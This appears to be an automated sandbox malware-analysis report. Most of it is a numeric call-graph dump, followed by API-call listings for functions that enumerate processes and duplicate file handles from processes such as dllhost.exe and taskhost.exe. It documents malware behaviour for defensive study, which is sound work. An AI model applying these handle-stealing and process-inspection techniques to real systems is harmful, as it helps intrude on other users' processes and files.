39873->39821 39874->39849 39875->39842 39876->39839 39877->39839 39878->39843 39879->39843 39880->39817 39881->39854 39882->39858 39907 441b3f 39917 43a9f6 39907->39917 39909 441b61 40090 4386af memset 39909->40090 39911 44189a 39912 4418e2 39911->39912 39916 442bd4 39911->39916 39914 4418ea 39912->39914 40091 4414a9 12 API calls 39912->40091 39916->39914 40092 441409 memset 39916->40092 39918 43aa20 39917->39918 39919 43aadf 39917->39919 39918->39919 39920 43aa34 memset 39918->39920 39919->39909 39921 43aa56 39920->39921 39922 43aa4d 39920->39922 40093 43a6e7 39921->40093 40234 42c02e memset 39922->40234 39927 43aad3 40235 4169a7 11 API calls 39927->40235 39929 43ac18 39932 43ac47 39929->39932 40237 42bbd5 memcpy memcpy memcpy memset memcpy 39929->40237 39933 43aca8 39932->39933 40238 438eed 16 API calls 39932->40238 39937 43acd5 39933->39937 40240 4233ae 11 API calls 39933->40240 39936 43ac87 40239 4233c5 16 API calls 39936->40239 40105 423426 39937->40105 39941 43ace1 40109 439811 39941->40109 39942 43a9f6 161 API calls 39943 43aae5 39942->39943 39943->39919 39943->39929 39943->39942 40236 439bbb 22 API calls 39943->40236 39945 43acfd 39950 43ad2c 39945->39950 40241 438eed 16 API calls 39945->40241 39947 43ad19 40242 4233c5 16 API calls 39947->40242 39949 43ad58 40138 44081d 39949->40138 39950->39949 39953 43add9 39950->39953 39952 423426 11 API calls 39954 43ae3a memset 39952->39954 39953->39952 39955 43ae73 39954->39955 40244 42e1c0 147 API calls 39955->40244 39956 43adab 40177 438c4e 39956->40177 39957 43ad6c 39957->39919 39957->39956 40243 42370b memset memcpy memset 39957->40243 39962 43ae96 40245 42e1c0 147 API calls 39962->40245 39965 43aea8 39966 43aec1 39965->39966 40246 42e199 147 API calls 39965->40246 39967 43af00 39966->39967 40247 42e1c0 147 API calls 39966->40247 39967->39919 39971 43af1a 39967->39971 39972 43b3d9 39967->39972 40248 438eed 16 API calls 39971->40248 39977 43b3f6 39972->39977 39978 43b4c8 39972->39978 39973 43b60f 39973->39919 40298 4393a5 17 API calls 39973->40298 39976 43af2f 40249 4233c5 16 API calls 39976->40249 40283 432878 12 API calls 39977->40283 39987 43b4f2 39978->39987 40289 42bbd5 memcpy memcpy memcpy memset memcpy 39978->40289 39980 43af51 39981 423426 11 API calls 39980->39981 39983 43af7d 39981->39983 39986 423426 11 API calls 39983->39986 39990 43af94 39986->39990 40290 43a76c 21 API calls 39987->40290 39988 43b529 39993 44081d 161 API calls 39988->39993 39989 43b462 40285 423330 11 API calls 39989->40285 40250 423330 11 API calls 39990->40250 39996 43b544 39993->39996 39994 43afca 40251 423330 11 API calls 39994->40251 39995 43b47e 39999 43b497 39995->39999 40286 42374a memcpy memset memcpy memcpy memcpy 39995->40286 40000 43b55c 39996->40000 40291 42c02e memset 39996->40291 39997 43b428 39997->39989 40284 432b60 16 API calls 39997->40284 40287 4233ae 11 API calls 39999->40287 40292 43a87a 163 API calls 40000->40292 40002 43afdb 40252 4233ae 11 API calls 40002->40252 40007 43b56c 40011 43b58a 40007->40011 40293 423330 11 API calls 40007->40293 40008 43b4b1 40288 423399 11 API calls 40008->40288 40010 43afee 40014 44081d 161 API calls 40010->40014 40015 440f84 12 API calls 40011->40015 40012 43b4c1 40295 42db80 163 API calls 40012->40295 40024 43b005 40014->40024 40017 43b592 40015->40017 40294 43a82f 16 API calls 40017->40294 40020 43b5b4 40021 438c4e 161 API calls 40020->40021 40022 43b5cf 40021->40022 40296 42c02e memset 40022->40296 40024->39919 40028 43b01f 40024->40028 40253 42d836 163 API calls 40024->40253 40025 43b1ef 40262 4233c5 16 API calls 40025->40262 40028->40025 40260 423330 11 API calls 40028->40260 40261 42d71d 163 API calls 40028->40261 40029 43b212 40263 423330 11 API calls 40029->40263 40031 43b087 40254 4233ae 11 API calls 40031->40254 40032 43add4 40032->39973 40297 438f86 16 API calls 40032->40297 40035 43b22a 40264 42ccb5 11 API calls 40035->40264 40038 43b23f 40265 4233ae 11 API calls 40038->40265 40039 43b10f 40257 423330 11 API calls 40039->40257 40041 43b257 40266 4233ae 11 API calls 40041->40266 40045 43b129 40258 4233ae 11 API calls 40045->40258 40046 43b26e 40267 4233ae 11 API calls 40046->40267 40049 43b09a 40049->40039 40255 42cc15 19 API calls 40049->40255 40256 4233ae 11 API calls 40049->40256 40050 43b282 40268 43a87a 163 API calls 40050->40268 40052 43b13c 40055 440f84 12 API calls 40052->40055 40054 43b29d 40269 423330 11 API calls 40054->40269 40057 43b15f 40055->40057 40259 4233ae 11 API calls 40057->40259 40058 43b2af 40059 43b2b8 40058->40059 40060 43b2ce 40058->40060 40270 4233ae 11 API calls 40059->40270 40063 440f84 12 API calls 40060->40063 40065 43b2da 40063->40065 40064 43b2c9 40272 4233ae 11 API calls 40064->40272 40271 42370b memset memcpy memset 40065->40271 40068 43b2f9 40273 423330 11 API calls 40068->40273 40070 43b30b 40274 423330 11 API calls 40070->40274 40072 43b325 40275 423399 11 API calls 40072->40275 40074 43b332 40276 4233ae 11 API calls 40074->40276 40076 43b354 40277 423399 11 API calls 40076->40277 40078 43b364 40278 43a82f 16 API calls 40078->40278 40080 43b370 40279 42db80 163 API calls 40080->40279 40082 43b380 40083 438c4e 161 API calls 40082->40083 40084 43b39e 40083->40084 40280 423399 11 API calls 40084->40280 40086 43b3ae 40281 43a76c 21 API calls 40086->40281 40088 43b3c3 40282 423399 11 API calls 40088->40282 40090->39911 40091->39914 40092->39916 40094 43a6f5 40093->40094 40096 43a765 40093->40096 40094->40096 40299 42a115 40094->40299 40096->39919 40101 4397fd 40096->40101 40099 43a73d 40099->40096 40100 42a115 147 API calls 40099->40100 40100->40096 40102 439804 40101->40102 40104 43980c 40101->40104 40530 42324c memset 40102->40530 40104->39919 40104->39927 40104->39943 40106 42343a 40105->40106 40108 42344c 40105->40108 40531 415bbe 11 API calls 40106->40531 40108->39941 40110 439828 40109->40110 40137 439952 40109->40137 40111 4397fd memset 40110->40111 40110->40137 40112 43984c 40111->40112 40113 4398b0 40112->40113 40114 43986b 40112->40114 40112->40137 40534 42d71d 163 API calls 40113->40534 40532 4233ae 11 API calls 40114->40532 40117 4398bd 40535 423399 11 API calls 40117->40535 40118 43987a 40120 439892 40118->40120 40533 423330 11 API calls 40118->40533 40120->40137 40537 42d71d 163 API calls 40120->40537 40121 4398c8 40536 4233ae 11 API calls 40121->40536 40125 4398f5 40538 423399 11 API calls 40125->40538 40127 439902 40539 423399 11 API calls 40127->40539 40129 43990c 40540 423330 11 API calls 40129->40540 40131 43991c 40541 423330 11 API calls 40131->40541 40133 439936 40542 423399 11 API calls 40133->40542 40135 439942 40543 423330 11 API calls 40135->40543 40137->39945 40139 440850 40138->40139 40140 44083e 40138->40140 40142 415a91 memset 40139->40142 40544 4169a7 11 API calls 40140->40544 40143 44087b 40142->40143 40144 44084a 40143->40144 40145 423426 11 API calls 40143->40145 40144->39957 40146 4408a6 memset 40145->40146 40147 44090c 40146->40147 40151 44092e 40146->40151 40147->40151 40545 42a003 147 API calls 40147->40545 40149 44093b 40152 440955 40149->40152 40157 440968 40149->40157 40547 42c0c8 147 API calls 40149->40547 40546 43e10c memset memcpy 40151->40546 40152->40157 40548 42db80 163 API calls 40152->40548 40156 440e28 40554 440799 40156->40554 40167 4409d1 40157->40167 40549 43e696 163 API calls 40157->40549 40158 440a01 memset 40158->40167 40160 440d1b 40160->40156 40552 432878 12 API calls 40160->40552 40162 440f3a 40162->40156 40163 440f50 40162->40163 40163->40144 40563 43fe30 163 API calls 40163->40563 40164 440e1c 40553 4169a7 11 API calls 40164->40553 40167->40156 40167->40158 40167->40160 40167->40164 40550 43f37c 14 API calls 40167->40550 40551 43f524 18 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40167->40551 40173 440d6a 40173->40162 40174 4233c5 16 API calls 40173->40174 40558 435f88 17 API calls 40173->40558 40559 42374a memcpy memset memcpy memcpy memcpy 40173->40559 40560 43ee22 23 API calls 40173->40560 40561 432b60 16 API calls 40173->40561 40562 432878 12 API calls 40173->40562 40174->40173 40178 438c78 40177->40178 40210 438ee5 40177->40210 40181 438c97 40178->40181 40565 438bb0 11 API calls 40178->40565 40179 438cdb 40202 438d0c 40179->40202 40567 438bfd 16 API calls 40179->40567 40181->40179 40566 42d836 163 API calls 40181->40566 40183 438eb1 40580 423330 11 API calls 40183->40580 40184 438d1f 40188 438e6a 40184->40188 40189 438d2d 40184->40189 40203 438d41 40184->40203 40193 438e70 40188->40193 40194 438e18 40188->40194 40192 438d36 40189->40192 40205 438dfa 40189->40205 40190 438e80 40195 438e96 40190->40195 40196 438e88 40190->40196 40191 438d54 40568 423330 11 API calls 40191->40568 40192->40203 40204 438d7c 40192->40204 40223 438d77 40192->40223 40577 42ccb5 11 API calls 40193->40577 40574 438aa3 163 API calls 40194->40574 40579 4233ae 11 API calls 40195->40579 40578 423399 11 API calls 40196->40578 40202->40183 40202->40184 40203->40190 40203->40191 40203->40223 40570 423330 11 API calls 40204->40570 40205->40194 40208 438e2a 40205->40208 40575 4233c5 16 API calls 40208->40575 40209 438d6a 40569 438aa3 163 API calls 40209->40569 40224 440f84 40210->40224 40213 438d92 40215 438d9b 40213->40215 40216 438dad 40213->40216 40571 438aa3 163 API calls 40215->40571 40572 4233ae 11 API calls 40216->40572 40217 438e44 40576 4233ae 11 API calls 40217->40576 40221 438dc4 40573 423330 11 API calls 40221->40573 40223->40210 40581 423330 11 API calls 40223->40581 40229 440fa7 40224->40229 40225 441223 40226 440799 memset 40225->40226 40227 441242 40226->40227 40227->40032 40228 423399 11 API calls 40232 441105 40228->40232 40230 423399 11 API calls 40229->40230 40231 4233ae 11 API calls 40229->40231 40229->40232 40582 423330 11 API calls 40229->40582 40230->40229 40231->40229 40232->40225 40232->40228 40234->39921 40235->39919 40236->39943 40237->39932 40238->39936 40239->39933 40240->39937 40241->39947 40242->39950 40243->39956 40244->39962 40245->39965 40246->39966 40247->39966 40248->39976 40249->39980 40250->39994 40251->40002 40252->40010 40253->40031 40254->40049 40255->40049 40256->40049 40257->40045 40258->40052 40259->40028 40260->40028 40261->40028 40262->40029 40263->40035 40264->40038 40265->40041 40266->40046 40267->40050 40268->40054 40269->40058 40270->40064 40271->40064 40272->40068 40273->40070 40274->40072 40275->40074 40276->40076 40277->40078 40278->40080 40279->40082 40280->40086 40281->40088 40282->40032 40283->39997 40284->39989 40285->39995 40286->39999 40287->40008 40288->40012 40289->39987 40290->39988 40291->40000 40292->40007 40293->40011 40294->40012 40295->40020 40296->40032 40297->39973 40298->39919 40300 42a175 40299->40300 40302 42a122 40299->40302 40300->40096 40305 42b13b 147 API calls 40300->40305 40302->40300 40303 42a115 147 API calls 40302->40303 40306 43a174 40302->40306 40330 42a0a8 147 API calls 40302->40330 40303->40302 40305->40099 40320 43a196 40306->40320 40321 43a19e 40306->40321 40307 43a306 40307->40320 40350 4388c4 14 API calls 40307->40350 40310 42a115 147 API calls 40310->40321 40312 43a642 40312->40320 40354 4169a7 11 API calls 40312->40354 40316 43a635 40353 42c02e memset 40316->40353 40320->40302 40321->40307 40321->40310 40321->40320 40331 42ff8c 40321->40331 40339 415a91 40321->40339 40343 4165ff 40321->40343 40346 439504 13 API calls 40321->40346 40347 4312d0 147 API calls 40321->40347 40348 42be4c memcpy memcpy memcpy memset memcpy 40321->40348 40349 43a121 11 API calls 40321->40349 40323 43a325 40323->40312 40323->40316 40323->40320 40324 4169a7 11 API calls 40323->40324 40325 42b5b5 memset memcpy 40323->40325 40326 42bf4c 14 API calls 40323->40326 40329 4165ff 11 API calls 40323->40329 40351 42b63e 14 API calls 40323->40351 40352 42bfcf memcpy 40323->40352 40324->40323 40325->40323 40326->40323 40329->40323 40330->40302 40355 43817e 40331->40355 40333 42ff9d 40333->40321 40334 42ff99 40334->40333 40335 42ffe3 40334->40335 40336 42ffd0 40334->40336 40360 4169a7 11 API calls 40335->40360 40359 4169a7 11 API calls 40336->40359 40340 415a9d 40339->40340 40341 415ab3 40340->40341 40342 415aa4 memset 40340->40342 40341->40321 40342->40341 40509 4165a0 40343->40509 40346->40321 40347->40321 40348->40321 40349->40321 40350->40323 40351->40323 40352->40323 40353->40312 40354->40320 40356 438187 40355->40356 40358 438192 40355->40358 40361 4380f6 40356->40361 40358->40334 40359->40333 40360->40333 40363 43811f 40361->40363 40362 438164 40362->40358 40363->40362 40366 437e5e 40363->40366 40389 4300e8 memset memset memcpy 40363->40389 40390 437d3c 40366->40390 40368 437eb3 40368->40363 40369 437ea9 40369->40368 40374 437f22 40369->40374 40405 41f432 40369->40405 40372 437f06 40452 415c56 11 API calls 40372->40452 40376 437f7f 40374->40376 40377 432d4e 3 API calls 40374->40377 40375 437f95 40453 415c56 11 API calls 40375->40453 40376->40375 40378 43802b 40376->40378 40377->40376 40380 4165ff 11 API calls 40378->40380 40381 438054 40380->40381 40416 437371 40381->40416 40384 43806b 40385 438094 40384->40385 40454 42f50e 138 API calls 40384->40454 40388 437fa3 40385->40388 40455 4300e8 memset memset memcpy 40385->40455 40388->40368 40456 41f638 104 API calls 40388->40456 40389->40363 40391 437d69 40390->40391 40394 437d80 40390->40394 40457 437ccb 11 API calls 40391->40457 40393 437d76 40393->40369 40394->40393 40395 437da3 40394->40395 40397 437d90 40394->40397 40398 438460 134 API calls 40395->40398 40397->40393 40461 437ccb 11 API calls 40397->40461 40401 437dcb 40398->40401 40399 437de8 40460 424f26 123 API calls 40399->40460 40401->40399 40458 444283 13 API calls 40401->40458 40403 437dfc 40459 437ccb 11 API calls 40403->40459 40406 41f54d 40405->40406 40412 41f44f 40405->40412 40407 41f466 40406->40407 40491 41c635 memset memset 40406->40491 40407->40372 40407->40374 40412->40407 40414 41f50b 40412->40414 40462 41f1a5 40412->40462 40487 41c06f memcmp 40412->40487 40488 41f3b1 90 API calls 40412->40488 40489 41f398 86 API calls 40412->40489 40414->40406 40414->40407 40490 41c295 86 API calls 40414->40490 40492 41703f 40416->40492 40418 437399 40419 43739d 40418->40419 40421 4373ac 40418->40421 40499 4446ea 11 API calls 40419->40499 40422 416935 16 API calls 40421->40422 40423 4373ca 40422->40423 40424 438460 134 API calls 40423->40424 40429 4251c4 137 API calls 40423->40429 40433 415a91 memset 40423->40433 40436 43758f 40423->40436 40448 437584 40423->40448 40451 437d3c 135 API calls 40423->40451 40500 425433 13 API calls 40423->40500 40501 425413 17 API calls 40423->40501 40502 42533e 16 API calls 40423->40502 40503 42538f 16 API calls 40423->40503 40504 42453e 123 API calls 40423->40504 40424->40423 40425 4375bc 40427 415c7d 16 API calls 40425->40427 40428 4375d2 40427->40428 40430 4442e6 11 API calls 40428->40430 40450 4373a7 40428->40450 40429->40423 40431 4375e2 40430->40431 40431->40450 40507 444283 13 API calls 40431->40507 40433->40423 40505 42453e 123 API calls 40436->40505 40439 4375f4 40442 437620 40439->40442 40443 43760b 40439->40443 40441 43759f 40444 416935 16 API calls 40441->40444 40446 416935 16 API calls 40442->40446 40508 444283 13 API calls 40443->40508 40444->40448 40446->40450 40448->40425 40506 42453e 123 API calls 40448->40506 40449 437612 memcpy 40449->40450 40450->40384 40451->40423 40452->40368 40453->40388 40454->40385 40455->40388 40456->40368 40457->40393 40458->40403 40459->40399 40460->40393 40461->40393 40463 41bc3b 101 API calls 40462->40463 40464 41f1b4 40463->40464 40465 41edad 86 API calls 40464->40465 40472 41f282 40464->40472 40466 41f1cb 40465->40466 40467 41f1f5 memcmp 40466->40467 40468 41f20e 40466->40468 40466->40472 40467->40468 40469 41f21b memcmp 40468->40469 40468->40472 40470 41f326 40469->40470 40473 41f23d 40469->40473 40471 41ee6b 86 API calls 40470->40471 40470->40472 40471->40472 40472->40412 40473->40470 40474 41f28e memcmp 40473->40474 40476 41c8df 56 API calls 40473->40476 40474->40470 40475 41f2a9 40474->40475 40475->40470 40478 41f308 40475->40478 40479 41f2d8 40475->40479 40477 41f269 40476->40477 40477->40470 40480 41f287 40477->40480 40481 41f27a 40477->40481 40478->40470 40485 4446ce 11 API calls 40478->40485 40482 41ee6b 86 API calls 40479->40482 40480->40474 40483 41ee6b 86 API calls 40481->40483 40484 41f2e0 40482->40484 40483->40472 40486 41b1ca memset 40484->40486 40485->40470 40486->40472 40487->40412 40488->40412 40489->40412 40490->40406 40491->40407 40493 417044 40492->40493 40494 41705c 40492->40494 40496 416760 11 API calls 40493->40496 40498 417055 40493->40498 40495 417075 40494->40495 40497 41707a 11 API calls 40494->40497 40495->40418 40496->40498 40497->40493 40498->40418 40499->40450 40500->40423 40501->40423 40502->40423 40503->40423 40504->40423 40505->40441 40506->40425 40507->40439 40508->40449 40514 415cfe 40509->40514 40519 415d23 __aullrem __aulldvrm 40514->40519 40521 41628e 40514->40521 40515 4163ca 40528 416422 11 API calls 40515->40528 40517 416422 10 API calls 40517->40519 40518 416172 memset 40518->40519 40519->40515 40519->40517 40519->40518 40520 415cb9 10 API calls 40519->40520 40519->40521 40520->40519 40522 416520 40521->40522 40523 416527 40522->40523 40527 416574 40522->40527 40525 416544 40523->40525 40523->40527 40529 4156aa 11 API calls 40523->40529 40526 416561 memcpy 40525->40526 40525->40527 40526->40527 40527->40321 40528->40521 40529->40525 40530->40104 40531->40108 40532->40118 40533->40120 40534->40117 40535->40121 40536->40120 40537->40125 40538->40127 40539->40129 40540->40131 40541->40133 40542->40135 40543->40137 40544->40144 40545->40151 40546->40149 40547->40152 40548->40157 40549->40157 40550->40167 40551->40167 40552->40173 40553->40156 40556 44080f 40554->40556 40557 4407a1 40554->40557 40556->40144 40564 43dfff memset 40557->40564 40558->40173 40559->40173 40560->40173 40561->40173 40562->40173 40563->40163 40564->40556 40565->40181 40566->40179 40568->40209 40569->40223 40570->40213 40571->40223 40572->40221 40573->40223 40574->40223 40575->40217 40576->40223 40577->40223 40578->40223 40579->40223 40580->40223 40581->40210 40582->40229 40604 41493c EnumResourceNamesW 37673 4287c1 37674 4287d2 37673->37674 37675 429ac1 37673->37675 37676 428818 37674->37676 37677 42881f 37674->37677 37683 425711 37674->37683 37688 425ad6 37675->37688 37743 415c56 11 API calls 37675->37743 37710 42013a 37676->37710 37738 420244 97 API calls 37677->37738 37682 4260dd 37737 424251 120 API calls 37682->37737 37683->37675 37685 4259da 37683->37685 37691 422aeb memset memcpy memcpy 37683->37691 37692 429a4d 37683->37692 37695 4260a1 37683->37695 37706 4259c2 37683->37706 37709 425a38 37683->37709 37726 4227f0 memset memcpy 37683->37726 37727 422b84 15 API calls 37683->37727 37728 422b5d memset memcpy memcpy 37683->37728 37729 422640 13 API calls 37683->37729 37731 4241fc 11 API calls 37683->37731 37732 42413a 90 API calls 37683->37732 37736 416760 11 API calls 37685->37736 37691->37683 37693 429a66 37692->37693 37697 429a9b 37692->37697 37739 415c56 11 API calls 37693->37739 37735 415c56 11 API calls 37695->37735 37698 429a96 37697->37698 37741 416760 11 API calls 37697->37741 37742 424251 120 API calls 37698->37742 37701 429a7a 37740 416760 11 API calls 37701->37740 37706->37688 37730 415c56 11 API calls 37706->37730 37709->37706 37733 422640 13 API calls 37709->37733 37734 4226e0 12 API calls 37709->37734 37711 42014c 37710->37711 37714 420151 37710->37714 37753 41e466 97 API calls 37711->37753 37713 420162 37713->37683 37714->37713 37715 4201b3 37714->37715 37716 420229 37714->37716 37717 4201b8 37715->37717 37718 4201dc 37715->37718 37716->37713 37719 41fd5e 86 API calls 37716->37719 37744 41fbdb 37717->37744 37718->37713 37722 4201ff 37718->37722 37750 41fc4c 37718->37750 37719->37713 37722->37713 37725 42013a 97 API calls 37722->37725 37725->37713 37726->37683 37727->37683 37728->37683 37729->37683 37730->37685 37731->37683 37732->37683 37733->37709 37734->37709 37735->37685 37736->37682 37737->37688 37738->37683 37739->37701 37740->37698 37741->37698 37742->37675 37743->37685 37745 41fbf1 37744->37745 37746 41fbf8 37744->37746 37749 41fc39 37745->37749 37768 4446ce 11 API calls 37745->37768 37758 41ee26 37746->37758 37749->37713 37754 41fd5e 37749->37754 37751 41ee6b 86 API calls 37750->37751 37752 41fc5d 37751->37752 37752->37718 37753->37714 37756 41fd65 37754->37756 37755 41fdab 37755->37713 37756->37755 37757 41fbdb 86 API calls 37756->37757 37757->37756 37759 41ee41 37758->37759 37760 41ee32 37758->37760 37769 41edad 37759->37769 37772 4446ce 11 API calls 37760->37772 37763 41ee3c 37763->37745 37766 41ee58 37766->37763 37774 41ee6b 37766->37774 37768->37749 37778 41be52 37769->37778 37772->37763 37773 41eb85 11 API calls 37773->37766 37775 41ee70 37774->37775 37776 41ee78 37774->37776 37834 41bf99 86 API calls 37775->37834 37776->37763 37779 41be6f 37778->37779 37780 41be5f 37778->37780 37786 41be8c 37779->37786 37799 418c63 37779->37799 37813 4446ce 11 API calls 37780->37813 37783 41be69 37783->37763 37783->37773 37784 41bee7 37784->37783 37817 41a453 86 API calls 37784->37817 37786->37783 37786->37784 37787 41bf3a 37786->37787 37790 41bed1 37786->37790 37816 4446ce 11 API calls 37787->37816 37789 41bef0 37789->37784 37792 41bf01 37789->37792 37790->37789 37793 41bee2 37790->37793 37791 41bf24 memset 37791->37783 37792->37791 37794 41bf14 37792->37794 37814 418a6d memset memcpy memset 37792->37814 37803 41ac13 37793->37803 37815 41a223 memset memcpy memset 37794->37815 37798 41bf20 37798->37791 37802 418c72 37799->37802 37800 418c94 37800->37786 37801 418d51 memset memset 37801->37800 37802->37800 37802->37801 37804 41ac52 37803->37804 37805 41ac3f memset 37803->37805 37808 41ac6a 37804->37808 37818 41dc14 19 API calls 37804->37818 37806 41acd9 37805->37806 37806->37784 37810 41aca1 37808->37810 37819 41519d 37808->37819 37810->37806 37811 41acc0 memset 37810->37811 37812 41accd memcpy 37810->37812 37811->37806 37812->37806 37813->37783 37814->37794 37815->37798 37816->37784 37818->37808 37822 4175ed 37819->37822 37830 417570 SetFilePointer 37822->37830 37825 41760a ReadFile 37826 417637 37825->37826 37827 417627 GetLastError 37825->37827 37828 4151b3 37826->37828 37829 41763e memset 37826->37829 37827->37828 37828->37810 37829->37828 37831 4175b2 37830->37831 37832 41759c GetLastError 37830->37832 37831->37825 37831->37828 37832->37831 37833 4175a8 GetLastError 37832->37833 37833->37831 37834->37776 37835 417bc5 37837 417c61 37835->37837 37841 417bda 37835->37841 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37841 37839 417c2c 37839->37841 37847 41851e 20 API calls 37839->37847 37841->37836 37841->37837 37841->37839 37842 4175b7 37841->37842 37843 4175d6 FindCloseChangeNotification 37842->37843 37844 4175c8 37843->37844 37845 4175df 37843->37845 37844->37845 37846 4175ce Sleep 37844->37846 37845->37841 37846->37843 37847->37839 39883 4147f3 39886 414561 39883->39886 39885 414813 39887 41456d 39886->39887 39888 41457f GetPrivateProfileIntW 39886->39888 39891 4143f1 memset _itow WritePrivateProfileStringW 39887->39891 39888->39885 39890 41457a 39890->39885 39891->39890

                                          Executed Functions

                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                          APIs
                                          • memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                          • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                          • memset.MSVCRT ref: 0040DF5F
                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                          • API String ID: 594330280-3398334509
                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                                          APIs
                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                          • memset.MSVCRT ref: 00413D7F
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
